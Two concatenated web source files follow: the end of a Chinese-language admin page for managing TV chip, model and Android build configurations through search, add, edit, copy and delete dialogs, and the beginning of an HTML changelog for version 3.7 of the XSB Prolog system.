<label for="androidVersion" class="control-label col-xs-4">安卓版本</label>
<select id="androidVersion" class="col-xs-7 inputstyle">
<option value=""></option>
<option value="Android4.2">Android4.2</option>
<option value="Android4.3">Android4.3</option>
<option value="Android4.4">Android4.4</option>
<option value="Android5.0">Android5.0</option>
<option value="Android5.1">Android5.1</option>
<option value="Android6.0">Android6.0</option>
</select>
</div>
<div class="col-xs-4 form-group">
<label for="chipid" class="control-label col-xs-4">芯片型号</label>
<select id="chipid" class="col-xs-7 inputstyle">
<option value=""></option>
<option value="MST6A828">MST6A828</option>
<option value="MST6A938">MST6A938</option>
<option value="AMLS905">AMLS905</option>
<option value="Hi3751V551">Hi3751V551</option>
<option value="RTD2991">RTD2991</option>
<option value="Hi3751V620">Hi3751V620</option>
<option value="Hi3751V600">Hi3751V600</option>
<option value="AMLT962">AMLT962</option>
<option value="MST6A828E">MST6A828E</option>
<option value="MST6A838">MST6A838</option>
<option value="RTD2995">RTD2995</option>
<option value="RTD2982">RTD2982</option>
<option value="Hi3751V510">Hi3751V510</option>
<option value="RTD2871">RTD2871</option>
<option value="MST6A828C">MST6A828C</option>
<option value="Hi3751MV500">Hi3751MV500</option>
<option value="Mstar648">Mstar648</option>
<option value="MST6A648">MST6A648</option>
<option value="AMLT968">AMLT968</option>
</select>
</div>
<div class="col-xs-4 form-group">
<label for="memory" class="control-label col-xs-4">内存</label>
<select id="memory" class="col-xs-7 inputstyle">
<option value=""></option>
<option value="256MB">256MB</option>
<option value="512MB">512MB</option>
<option value="768MB">768MB</option>
<option value="1GB">1GB</option>
<option value="1.5GB">1.5GB</option>
<option value="2GB">2GB</option>
<option value="2.5GB">2.5GB</option>
<option value="3GB">3GB</option>
<option value="3.5GB">3.5GB</option>
<option value="4GB">4GB</option>
</select>
</div>
</div>
<div class="form-group text-center">
<div class="col-sm-offset- col-sm-4"></div>
<div class="col-sm-offset- col-sm-2">
<button type="submit" class="btn btn-default btn-success" id="searchInfo">查询</button>
</div>
<div class="col-sm-offset- col-sm-2">
<button type="reset" class="btn btn-default btn-success" id="reset">重置</button>
</div>
<div class="col-sm-offset- col-sm-4"></div>
</div>
</fieldset>
<fieldset>
<legend>内容列表</legend>
<div class="">
<button type="button" class="btn btn-default" id="wait-add">新增</button>
<button type="button" class="btn btn-default" id="wait-change">批量修改</button>
<button type="button" class="btn btn-default" id="wait-delete">批量删除</button>
</div>
<div class="row">
<div class="col-xs-12">
<table class="table table-striped table-bordered table-hover" id="contenttable">
<thead>
<tr>
<th>选择</th>
<th>机芯</th>
<th>机型</th>
<th>Android版本</th>
<th>芯片型号</th>
<th>内存</th>
<th>操作</th>
</tr>
</thead>
<tbody id="wait-tablebody">
</tbody>
</table>
</div>
</div>
</fieldset>
</div>
<!--点击新增弹出新增的modal-->
<div class="modal fade" id="myAddModal" style="padding-right: 0;" tabindex="-1" role="dialog" aria-labelledby="myAddModalLabel">
<div class="modalwidth" role="document">
<div class="modal-content">
<div class="modal-header myheader">
<button type="button" class="close" aria-label="Close" id="myAddModalClose"><span aria-hidden="true">关闭</span></button>
<button type="button" class="close" id="myAddModalSubmit"><span aria-hidden="true">提交</span></button>
<h4 class="modal-title" id="myAddModalLabel">新增</h4>
<h4 id="myAddModalErrorInfo" class="myModalErrorInfo"></h4>
</div>
<div class="modal-body mybody">
<table class="table table-bordered " id="myAddModalTable"><!--mytable-->
<tr>
<td>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newAddChip" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="oChip">机芯 :</label>
<input type="text" value="" id="newAddChip" class="col-xs-5 col-xs-push-1 inputstyle text-left">
</div>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newAddModel" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="oModel">机型 :</label>
<input type="text" value="" id="newAddModel" class="col-xs-5 col-xs-push-1 inputstyle text-left">
</div>
</td>
</tr>
<tr>
<td>
<div class="col-xs-6 form-group inputdiv">
<label for="newAddDevice" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="TARGET_PRODUCT">TARGET_PRODUCT :</label>
<input type="text" value="" id="newAddDevice" class="col-xs-5 col-xs-push-1 inputstyle text-left">
</div>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="NewAddAndroidVersion" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="AndroidVersion">Android版本 :</label>
<select id="NewAddAndroidVersion" class="col-xs-5 col-xs-push-1 inputstyle text-left">
<option value="Android4.2">Android4.2</option>
<option value="Android4.3">Android4.3</option>
<option value="Android4.4">Android4.4</option>
<option value="Android5.0">Android5.0</option>
<option value="Android5.1">Android5.1</option>
<option value="Android6.0">Android6.0</option>
</select>
</div>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newAddChipMode" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="ChipMode">芯片型号 :</label>
<select id="newAddChipMode" class="col-xs-5 col-xs-push-1 inputstyle text-left">
<option value="MST6A828">MST6A828</option>
<option value="MST6A938">MST6A938</option>
<option value="AMLS905">AMLS905</option>
<option value="Hi3751V551">Hi3751V551</option>
<option value="RTD2991">RTD2991</option>
<option value="Hi3751V620">Hi3751V620</option>
<option value="Hi3751V600">Hi3751V600</option>
<option value="AMLT962">AMLT962</option>
<option value="MST6A828E">MST6A828E</option>
<option value="MST6A838">MST6A838</option>
<option value="RTD2995">RTD2995</option>
<option value="RTD2982">RTD2982</option>
<option value="Hi3751V510">Hi3751V510</option>
<option value="RTD2871">RTD2871</option>
<option value="MST6A828C">MST6A828C</option>
<option value="Hi3751MV500">Hi3751MV500</option>
<option value="Mstar648">Mstar648</option>
<option value="MST6A648">MST6A648</option>
<option value="AMLT968">AMLT968</option>
</select>
</div>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newAddMemory" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="memory">内存 :</label>
<select id="newAddMemory" class="col-xs-5 col-xs-push-1 inputstyle text-left">
<option value="256MB">256MB</option>
<option value="512MB">512MB</option>
<option value="768MB">768MB</option>
<option value="1GB">1GB</option>
<option value="1.5GB">1.5GB</option>
<option value="2GB">2GB</option>
<option value="2.5GB">2.5GB</option>
<option value="3GB">3GB</option>
<option value="3.5GB">3.5GB</option>
<option value="4GB">4GB</option>
</select>
</div>
</td>
</tr>
<tr>
<td style="padding: 0;">
<div class="btn-group">
<button type="button" class="btn btn-default" id="myAddModalMkButton">MK文件</button>
<button type="button" class="btn btn-default" id="myAddModalConfigButton">config文件</button>
</div>
<div class="col-xs-12 inputstyle" id="myAddModalMkTable">
<table class="table table-bordered"><!--mytable-->
<tbody id="myAddModalMkTableTbody">
<tr>
<td id="myAddModalMkTablePlayerLibrary"></td>
</tr>
<tr>
<td id="myAddModalMkTableApp"></td>
</tr>
<tr>
<td id="myAddModalMkTableService"></td>
</tr>
<tr>
<td id="myAddModalMkTableAppStore"></td>
</tr>
<tr>
<td id="myAddModalMkTableHomePage"></td>
</tr>
<tr>
<td id="myAddModalMkTableIME"></td>
</tr>
<tr>
<td id="myAddModalMkTableSysApp"></td>
</tr>
<tr>
<td id="myAddModalMkTableTV"></td>
</tr>
<tr>
<td id="myAddModalMkTableOther"></td>
</tr>
</tbody>
</table>
</div>
<div class="col-xs-12 inputstyle" id="myAddModalConfigTable">
<table class="table table-bordered"><!--mytable-->
<tbody id="myAddModalConfigTableTbody">
<tr>
<td id="myAddModalConfigTableTdBase"></td>
</tr>
<tr>
<td id="myAddModalConfigTableTdServerip"></td>
</tr>
<tr>
<td id="myAddModalConfigTableTdAd"></td>
</tr>
<tr>
<td id="myAddModalConfigTableTdChannel"></td>
</tr>
<tr>
<td id="myAddModalConfigTableTdLocalmedia"></td>
</tr>
<tr>
<td id="myAddModalConfigTableTdOther"></td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</table>
</div>
<div class="modal-footer myfooter">
<button type="button" class="btn btn-default" id="myAddModalSubmitTwo">提交</button>
</div>
</div>
</div>
</div>
<div class="col-xs-8" id="myAddCloseDiv" style="padding-right: 0;" tabindex="-1" role="dialog" aria-labelledby="myEditEnsureModalLabel">
<div class="modal-delete" role="document">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" aria-label="Close" id="myEnsureX"><span aria-hidden="true">×</span></button>
<h4 class="modal-title text-left" id="myDeleteModalLabel">关闭</h4>
</div>
<div class="modal-body">
<p id="infoEdit" style="font-size: 24px;text-align: center;">确认要关闭吗?</p>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-primary" id="myEditEnsureModalEnsure">确定</button>
<button type="button" class="btn btn-default" id="myEnsureCancle">取消</button>
</div>
</div>
</div>
</div>
<div class="col-xs-8" id="myVideoChangeDiv" style="padding-right: 0;" tabindex="-1" role="dialog" aria-labelledby="myVCModalLabel">
<div class="modal-delete" role="document">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" aria-label="Close" id="myVC-X"><span aria-hidden="true">×</span></button>
<h3 class="modal-title text-left" id="myVCModalLabel">提示:请确认您的配置</h3>
</div>
<div class="modal-body">
<p class="text-left">该config配置项与MK中播放器so配置项的对应关系如下:</p>
<dl class="dl-horizontal">
<dt style="width: 40%;"><p>Config-播放器内核</p></dt><dd><p>MK-PlayerLibrary</p></dd>
<dt style="width: 40%;"><p>bj_decoder</p></dt><dd><p>JNI版本</p></dd>
<dt style="width: 40%;"><p>mediaplayer</p></dt><dd><p>mix版本</p></dd>
<dt style="width: 40%;"><p>mediaplayer</p></dt><dd><p>不集成</p></dd>
<dt style="width: 40%;"><p>platform</p></dt><dd><p>不集成</p></dd>
<dt style="width: 40%;"><p>platform</p></dt><dd><p>JNI版本</p></dd>
</dl>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-primary" id="myVC-Ensure">确定</button>
</div>
</div>
</div>
</div>
<!--点击批量修改弹出批量修改的modal-->
<div class="modal fade" id="myMoreEditModal" style="padding-right: 0;" tabindex="-1" role="dialog" aria-labelledby="myMoreEditModalLabel">
<div class="modalwidth" role="document">
<div class="modal-content">
<div class="modal-header myheader">
<button type="button" class="close" aria-label="Close" id="myMoreEditModalClose"><span aria-hidden="true">关闭</span></button>
<button type="button" class="close" id="myMoreEditModalSubmit"><span aria-hidden="true">提交</span></button>
<h4 class="modal-title" id="myMoreEditModalLabel">批量修改</h4>
<span id="myMEModalErrorInfo" class="myModalErrorInfo"></span>
</div>
<div class="modal-body mybody">
<table class="table table-bordered" id="myMoreEditModalTable">
<tr>
<td style="padding: 0;">
<div class="btn-group">
<button type="button" class="btn btn-default" id="myMoreEditModalMkButton" >批量编辑MK文件</button>
<button type="button" class="btn btn-default" id="myMoreEditModalConfigButton" >批量编辑config文件</button>
</div>
<div class="col-xs-12 inputstyle" id="myMoreEditModalMkTable">
<table class="table table-bordered "><!--mytable-->
<tbody id="myMoreEditModalMkTableTbody">
<tr>
<td id="myMoreEditModalMkTableApp"></td>
</tr>
<tr>
<td id="myMoreEditModalMkTableService"></td>
</tr>
<tr>
<td id="myMoreEditModalMkTableAppStore"></td>
</tr>
<tr>
<td id="myMoreEditModalMkTableHomePage"></td>
</tr>
<tr>
<td id="myMoreEditModalMkTableIME"></td>
</tr>
<tr>
<td id="myMoreEditModalMkTableSysApp"></td>
</tr>
<tr>
<td id="myMoreEditModalMkTableTV"></td>
</tr>
<tr>
<td id="myMoreEditModalMkTableOther"></td>
</tr>
</tbody>
</table>
</div>
<div class="col-xs-12 inputstyle" id="myMoreEditModalConfigTable">
<table class="table table-bordered fontsize "><!--mytable-->
<tbody id="myMoreEditModalConfigTableTbody">
<tr>
<td id="myMoreEditModalConfigTableTdBase"></td>
</tr>
<tr>
<td id="myMoreEditModalConfigTableTdServerip"></td>
</tr>
<tr>
<td id="myMoreEditModalConfigTableTdAd"></td>
</tr>
<tr>
<td id="myMoreEditModalConfigTableTdChannel"></td>
</tr>
<tr>
<td id="myMoreEditModalConfigTableTdLocalmedia"></td>
</tr>
<tr>
<td id="myMoreEditModalConfigTableTdOther"></td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</table>
</div>
<div class="modal-footer myfooter">
<button type="button" class="btn btn-default" id="myMoreEditModalSubmitTwo">提交</button>
</div>
</div>
</div>
</div>
<!--点击编辑弹出编辑的modal-->
<div class="modal fade" id="myEditModal" style="padding-right: 0;" tabindex="-1" role="dialog" aria-labelledby="myEditModalLabel">
<div class="modalwidth" role="document">
<div class="modal-content">
<div class="modal-header myheader">
<button type="button" class="close" aria-label="Close" id="myEditModalClose"><span aria-hidden="true">关闭</span></button>
<button type="button" class="close" id="myEditModalSubmit"><span aria-hidden="true">提交</span></button>
<h4 class="modal-title" id="myEditModalLabel">编辑</h4>
<h4 id="myEditModalErrorInfo" class="myModalErrorInfo"></h4>
</div>
<div class="modal-body mybody">
<table class="table table-bordered " id="myEditModalTable"><!--mytable-->
<tr>
<td>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newEditChip" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="oChip">机芯 :</label>
<input type="text" value="" id="newEditChip" class="col-xs-5 col-xs-push-1 inputstyle text-left" disabled="true ">
</div>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newEditModel" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="oModel">机型 :</label>
<input type="text" value="" id="newEditModel" class="col-xs-5 col-xs-push-1 inputstyle text-left" disabled="true ">
</div>
</td>
</tr>
<tr>
<td>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newEditDevice" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="TARGET_PRODUCT">TARGET_PRODUCT :</label>
<input type="text" value="" id="newEditDevice" class="col-xs-5 col-xs-push-1 inputstyle text-left">
</div>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="NewEditAndroidVersion" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="AndroidVersion">Android版本 :</label>
<select id="NewEditAndroidVersion" class="col-xs-5 col-xs-push-1 inputstyle text-left">
<option value="Android4.2">Android4.2</option>
<option value="Android4.3">Android4.3</option>
<option value="Android4.4">Android4.4</option>
<option value="Android5.0">Android5.0</option>
<option value="Android5.1">Android5.1</option>
<option value="Android6.0">Android6.0</option>
</select>
</div>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newEditChipMode" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="ChipMode">芯片型号 :</label>
<select id="newEditChipMode" placeholder="newChipMode" class="col-xs-5 col-xs-push-1 inputstyle text-left">
<option value="MST6A828">MST6A828</option>
<option value="MST6A938">MST6A938</option>
<option value="AMLS905">AMLS905</option>
<option value="Hi3751V551">Hi3751V551</option>
<option value="RTD2991">RTD2991</option>
<option value="Hi3751V620">Hi3751V620</option>
<option value="Hi3751V600">Hi3751V600</option>
<option value="AMLT962">AMLT962</option>
<option value="MST6A828E">MST6A828E</option>
<option value="MST6A838">MST6A838</option>
<option value="RTD2995">RTD2995</option>
<option value="RTD2982">RTD2982</option>
<option value="Hi3751V510">Hi3751V510</option>
<option value="RTD2871">RTD2871</option>
<option value="MST6A828C">MST6A828C</option>
<option value="Hi3751MV500">Hi3751MV500</option>
<option value="Mstar648">Mstar648</option>
<option value="MST6A648">MST6A648</option>
<option value="AMLT968">AMLT968</option>
</select>
</div>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newEditMemory" class="control-label col-xs-5 text-right inputdiv" title="memory">内存 :</label>
<select id="newEditMemory" placeholder="newMemory" class="col-xs-5 col-xs-push-1 inputstyle text-left">
<option value="256MB">256MB</option>
<option value="512MB">512MB</option>
<option value="768MB">768MB</option>
<option value="1GB">1GB</option>
<option value="1.5GB">1.5GB</option>
<option value="2GB">2GB</option>
<option value="2.5GB">2.5GB</option>
<option value="3GB">3GB</option>
<option value="3.5GB">3.5GB</option>
<option value="4GB">4GB</option>
</select>
</div>
</td>
</tr>
<tr>
<td style="padding: 0;">
<div class="btn-group">
<button type="button" class="btn btn-default" id="myEditModalMkButton" >MK文件</button>
<button type="button" class="btn btn-default" id="myEditModalConfigButton">config文件</button>
</div>
<div class="col-xs-12 inputstyle" id="myEditModalMkTable">
<table class="table table-bordered "><!--mytable-->
<tbody id="myEditModalMkTableTbody">
<tr>
<td id="myEditModalMkTablePlayerLibrary"></td>
</tr>
<tr>
<td id="myEditModalMkTableApp"></td>
</tr>
<tr>
<td id="myEditModalMkTableService"></td>
</tr>
<tr>
<td id="myEditModalMkTableAppStore"></td>
</tr>
<tr>
<td id="myEditModalMkTableHomePage"></td>
</tr>
<tr>
<td id="myEditModalMkTableIME"></td>
</tr>
<tr>
<td id="myEditModalMkTableSysApp"></td>
</tr>
<tr>
<td id="myEditModalMkTableTV"></td>
</tr>
<tr>
<td id="myEditModalMkTableOther"></td>
</tr>
</tbody>
</table>
</div>
<div class="col-xs-12 inputstyle" id="myEditModalConfigTable">
<table class="table table-bordered "><!--mytable-->
<tbody id="myEditModalConfigTableTbody">
<tr>
<td id="myEditModalConfigTableTdBase"></td>
</tr>
<tr>
<td id="myEditModalConfigTableTdServerip"></td>
</tr>
<tr>
<td id="myEditModalConfigTableTdAd"></td>
</tr>
<tr>
<td id="myEditModalConfigTableTdChannel"></td>
</tr>
<tr>
<td id="myEditModalConfigTableTdLocalmedia"></td>
</tr>
<tr>
<td id="myEditModalConfigTableTdOther"></td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</table>
</div>
<div class="modal-footer myfooter">
<button type="button" class="btn btn-default" id="myEditModalSubmitTwo">提交</button>
</div>
</div>
</div>
</div>
<!--点击复制弹出复制的modal-->
<div class="modal fade" id="myCopyModal" style="padding-right: 0;" tabindex="-1" role="dialog" aria-labelledby="myCopyModalLabel">
<div class="modalwidth" role="document">
<div class="modal-content">
<div class="modal-header myheader">
<button type="button" class="close" aria-label="Close" id="myCopyModalClose"><span aria-hidden="true">关闭</span></button>
<button type="button" class="close" id="myCopyModalSubmit"><span aria-hidden="true">提交</span></button>
<h4 class="modal-title" id="myCopyModalLabel">新建机芯机型</h4>
<h4 id="myCopyModalErrorInfo" class="myModalErrorInfo"></h4>
</div>
<div class="modal-body mybody">
<table class="table table-bordered " id="myCopyModalTable"><!--mytable-->
<tr>
<td>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newCopyChip" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="oChip">机芯 :</label>
<input type="text" value="" id="newCopyChip" class="col-xs-5 col-xs-push-1 inputstyle text-left">
</div>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newCopyModel" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="oModel">机型 :</label>
<input type="text" value="" id="newCopyModel" class="col-xs-5 col-xs-push-1 inputstyle text-left">
</div>
</td>
</tr>
<tr>
<td>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newCopyDevice" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="TARGET_PRODUCT">TARGET_PRODUCT :</label>
<input type="text" value="" id="newCopyDevice" class="col-xs-5 col-xs-push-1 inputstyle text-left">
</div>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="NewCopyAndroidVersion" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="AndroidVersion">Android版本 :</label>
<select id="NewCopyAndroidVersion" class="col-xs-5 col-xs-push-1 inputstyle text-left">
<option value="Android4.2">Android4.2</option>
<option value="Android4.3">Android4.3</option>
<option value="Android4.4">Android4.4</option>
<option value="Android5.0">Android5.0</option>
<option value="Android5.1">Android5.1</option>
<option value="Android6.0">Android6.0</option>
</select>
</div>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newCopyChipMode" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="ChipMode">芯片型号 :</label>
<select id="newCopyChipMode" class="col-xs-5 col-xs-push-1 inputstyle text-left">
<option value="MST6A828">MST6A828</option>
<option value="MST6A938">MST6A938</option>
<option value="AMLS905">AMLS905</option>
<option value="Hi3751V551">Hi3751V551</option>
<option value="RTD2991">RTD2991</option>
<option value="Hi3751V620">Hi3751V620</option>
<option value="Hi3751V600">Hi3751V600</option>
<option value="AMLT962">AMLT962</option>
<option value="MST6A828E">MST6A828E</option>
<option value="MST6A838">MST6A838</option>
<option value="RTD2995">RTD2995</option>
<option value="RTD2982">RTD2982</option>
<option value="Hi3751V510">Hi3751V510</option>
<option value="RTD2871">RTD2871</option>
<option value="MST6A828C">MST6A828C</option>
<option value="Hi3751MV500">Hi3751MV500</option>
<option value="Mstar648">Mstar648</option>
<option value="MST6A648">MST6A648</option>
<option value="AMLT968">AMLT968</option>
</select>
</div>
<div class="col-xs-6 form-group text-left inputdiv">
<label for="newCopyMemory" class="control-label col-xs-5 text-right inputdiv checkModalSpan" title="memory">内存 :</label>
<select id="newCopyMemory" class="col-xs-5 col-xs-push-1 inputstyle text-left">
<option value="256MB">256MB</option>
<option value="512MB">512MB</option>
<option value="768MB">768MB</option>
<option value="1GB">1GB</option>
<option value="1.5GB">1.5GB</option>
<option value="2GB">2GB</option>
<option value="2.5GB">2.5GB</option>
<option value="3GB">3GB</option>
<option value="3.5GB">3.5GB</option>
<option value="4GB">4GB</option>
</select>
</div>
</td>
</tr>
<tr>
<td style="padding: 0;">
<div class="btn-group">
<button type="button" class="btn btn-default" id="myCopyModalMkButton">MK文件</button>
<button type="button" class="btn btn-default" id="myCopyModalConfigButton">config文件</button>
</div>
<div class="col-xs-12 inputstyle" id="myCopyModalMkTable">
<table class="table table-bordered">
<tbody id="myCopyModalMkTableTbody">
<tr>
<td id="myCopyModalMkTablePlayerLibrary"></td>
</tr>
<tr>
<td id="myCopyModalMkTableApp"></td>
</tr>
<tr>
<td id="myCopyModalMkTableService"></td>
</tr>
<tr>
<td id="myCopyModalMkTableAppStore"></td>
</tr>
<tr>
<td id="myCopyModalMkTableHomePage"></td>
</tr>
<tr>
<td id="myCopyModalMkTableIME"></td>
</tr>
<tr>
<td id="myCopyModalMkTableSysApp"></td>
</tr>
<tr>
<td id="myCopyModalMkTableTV"></td>
</tr>
<tr>
<td id="myCopyModalMkTableOther"></td>
</tr>
</tbody>
</table>
</div>
<div class="col-xs-12 inputstyle" id="myCopyModalConfigTable">
<table class="table table-bordered "><!--mytable-->
<tbody id="myCopyModalConfigTableTbody">
<tr>
<td id="myCopyModalConfigTableTdBase"></td>
</tr>
<tr>
<td id="myCopyModalConfigTableTdServerip"></td>
</tr>
<tr>
<td id="myCopyModalConfigTableTdAd"></td>
</tr>
<tr>
<td id="myCopyModalConfigTableTdChannel"></td>
</tr>
<tr>
<td id="myCopyModalConfigTableTdLocalmedia"></td>
</tr>
<tr>
<td id="myCopyModalConfigTableTdOther"></td>
</tr>
</tbody>
</table>
</div>
</td>
</tr>
</table>
</div>
<div class="modal-footer myfooter">
<button type="button" class="btn btn-default" id="myCopyModalSubmitTwo">提交</button>
</div>
</div>
</div>
</div>
<!--点击批量删除弹出批量删除的modal-->
<div class="modal fade col-xs-8" id="myMoreDeleteModal" style="padding-right: 0;" tabindex="-1" role="dialog" aria-labelledby="myMoreDeleteModalLabel">
<div class="modal-delete" role="document">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
<h4 class="modal-title" id="myMoreDeleteModalLabel">系统提示:</h4>
<span id="myMDModalErrorInfo" class="myModalErrorInfo"></span>
</div>
<div class="modal-body">
<p style="font-size: 24px;text-align: center;">确认删除吗?确认后可在待审核文件查询。</p>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-primary" id="myMoreDeleteModalEnsure">确定</button>
<!--<button type="button" class="btn btn-default" data-dismiss="modal">取消</button>-->
</div>
</div>
</div>
</div>
<!--点击删除弹出删除的modal-->
<div class="modal fade col-xs-8" id="myDeleteModal" style="padding-right: 0;" tabindex="-1" role="dialog" aria-labelledby="myDeleteModalLabel">
<div class="modal-delete" role="document">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
<h4 class="modal-title" id="myDeleteModalLabel">删除</h4>
<h4 id="myDeleteModalErrorInfo" class="myModalErrorInfo"></h4>
</div>
<div class="modal-body">
<p style="font-size: 24px;text-align: center;">确认要删除吗?</p>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-primary" id="myDeleteModalEnsure">确定</button>
<!--<button type="button" class="btn btn-default" data-dismiss="modal">取消</button>-->
</div>
</div>
</div>
</div>
<!--批量修改-保存-确认框-->
<div class="col-xs-8 text-left" id="myMoreEditSubmitModal" style="padding-right: 0; top: 7%;" tabindex="-1" role="dialog" aria-labelledby="myMoreEditSubmitModalLabel">
<div class="modalwidth" role="document">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" aria-label="Close" id="MoreEditX"><span aria-hidden="true">×</span></button>
<h4 class="modal-title text-left" id="myMoreEditSubmitModalLabel">批量修改确认框</h4>
</div>
<div class="modal-body">
<p class="moreEditDetail">是否确认保存修改?</p>
<p class="moreEditDetail">针对:<span id="AimAtChipAndModel" style="color: skyblue;"></span>型号的机器做了如下修改。</p>
<p class="moreEditDetail">新增模块:<span id="addmodules" style="color: skyblue;"></span></p>
<p class="moreEditDetail">删除模块:<span id="deletemodules" style="color: skyblue;"></span></p>
<p class="moreEditDetail">配置项:<span id="setmodules" style="color: skyblue;"></span></p>
<p class="moreEditDetail">您未做任何操作。</p>
</div>
<div class="modal-footer">
<button type="submit" class="btn btn-primary" id="MoreEditSaveSubmit">确定</button>
<button type="reset" class="btn btn-default" id="MoreEditBack">取消</button>
</div>
</div>
</div>
</div>
<!--请先勾选要删除的项-->
<div class="modal fade col-xs-8" id="myDeleteDialogModal" style="padding-right: 0;" tabindex="-1" role="dialog" aria-labelledby="myDeleteDialogModalLabel">
<div class="modal-delete" role="document">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-label="Close"><span aria-hidden="true">×</span></button>
<h4 class="modal-title" id="myDeleteModalLabel">系统提示:</h4>
</div>
<div class="modal-body">
<p style="font-size: 24px;text-align: center;">请先选择要修改或删除的项。</p>
</div>
<div class="modal-footer">
<button type="button" class="btn btn-primary" data-dismiss="modal">确定</button>
<!--<button type="button" class="btn btn-default" data-dismiss="modal">取消</button>-->
</div>
</div>
</div>
</div>
<!--ti提交成功的弹框-->
<!--<div class="col-xs-8" id="successMessage">数据提交成功,可在待审核页面查看该条数据。</div>-->
<script src="../javascripts/wait.js"></script>
</body>
</html>
|
lib/XSB/docs/homepage/changelog.html | KULeuven-KRR/IDP | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<link type="text/css" rel="stylesheet" href="xsb.css">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-15">
<title>Release Notes</title>
</head>
<body>
<div class="xsb-menu">
<p>
<a href="index.html" >Home</a>
<a href="research.html" >Research</a>
<a href="xsbsystem.html" >XSB System</a>
<a href="contactus.html" >Contact Us</a>
</p>
</div>
<h1>ChangeLog</h1>
<h2> Version 3.7 (Clan MacGregor)</h2>
<ul>
<li><b> Enhancements </b></li>
<ul>
<li> XSB now supports a novel set of related debugging techniques that
allow dynamic inspection of a logical derivation.<ul>
<li> A derivation may be suspended and inspected via its table state,
its subgoal dependency graph, its incremental dependency graph, and
its residual dependency graph. The graph views may also be abstracted
using homomorphisms. Each of these views displays aspects of a
computation that can be useful for different purposes.</li>
<li> A derivation may be suspended using
dynamically-modifiable <i>tripwires</i> which are activiated when a
derivation takes more time or space than expected or allowed. Tripwire
conditions include derivation time, amount of memory used, size of
goal, size of answer, number of non-completed tabled calls, and
recursive component size. Tripwires are quite general, and can also
be used to apply abstraction to a subgoal or answer, or simply to
throw an error.</li>
<li> During a debugging session a derivation can also be suspended
via <tt>ctrl-c</tt>, and then inspected in the same manner.</li>
<li> XSB's handling of break levels has been extended to safely
support inspection of suspended tabled derivations.</li>
</ul></li>
<li> XSB's computation of the well-founded semantics (WFS) now
automatically performs the answer completion operation, which makes
XSB's resolution method complete for WFS. (This is currently
available in the single-threaded engine only.)</li>
<li> Answer Subsumption now works correctly and efficiently with
undefined answers. (Also, miscellaneous bugs in declarations for
answer subsumption have been fixed.) </li>
<li> There is now better support for 64-bit Cygwin as well as better
support for XSB's packages under Windows.</li>
<li> Performance improvements for tabling with call subsumption are
available using a new <tt>table_index</tt> directive to specify
alternate indexing of tables.</li>
<li> XSB's <tt>timed_call/1</tt> is now more powerful and supports a
mixture of co-routining capabilities. These capabilities can be
modified or cancelled during the course of inspecting a suspended
derivation.</li>
<li> A new predicate, <tt>crypto_hash/3</tt> encrypts atoms according
to the <tt>md5</tt> or <tt>ssh1</tt> algorithms.
</ul>
<li><b> Bug fixes and minor changes </b></li>
<ul>
<li>Numerous fixes and enhancements for abstracting tabled subgoals
and answers as well as for checking their size.
<ul><li>Enhancements were also made to tabling routines to handle very
large subgoal or answer terms. Term sizes in the tens of thousands
with many thousands of variables are now supported for
subgoals, and sizes in the hundred thousands with tens of thousands of
variables are supported for answers.</li>
<li> Such sizes may indicate errors in many applications, so
these sizes may be restricted via tripwires.</li></ul></li>
<li> Various fixes for obscure but important errors in heap garbage
collection, in <tt>get_residual/2</tt>; in repeatedly asserting and
retracting the same dynamic clauses; and in compiler register
allocation. In addition, various memrory problems uncovered by Valgrind were fixed.</li>
<li> <tt>statistics/0</tt> now displays better consistency for various
categories of memory usage. For <tt>statistics/2</tt>,
a <tt>table_ops</tt> key has been added, and <tt>statistics/2</tt> now
includes an SCC count for the <tt>incomplete_tables</tt> key.</li>
<li> Various packages have been made more robust. ODBC now closes
cursors on abort. Socket handling has been improved in several ways,
such as when XSB catches signals.</li>
